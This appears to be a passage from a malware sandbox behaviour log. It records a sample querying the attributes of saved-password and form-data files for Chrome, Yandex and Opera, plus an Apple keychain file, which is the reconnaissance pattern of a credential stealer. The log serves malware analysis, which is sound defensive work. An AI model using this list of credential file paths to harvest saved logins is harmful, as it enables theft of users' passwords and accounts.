| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes |
|
1 |
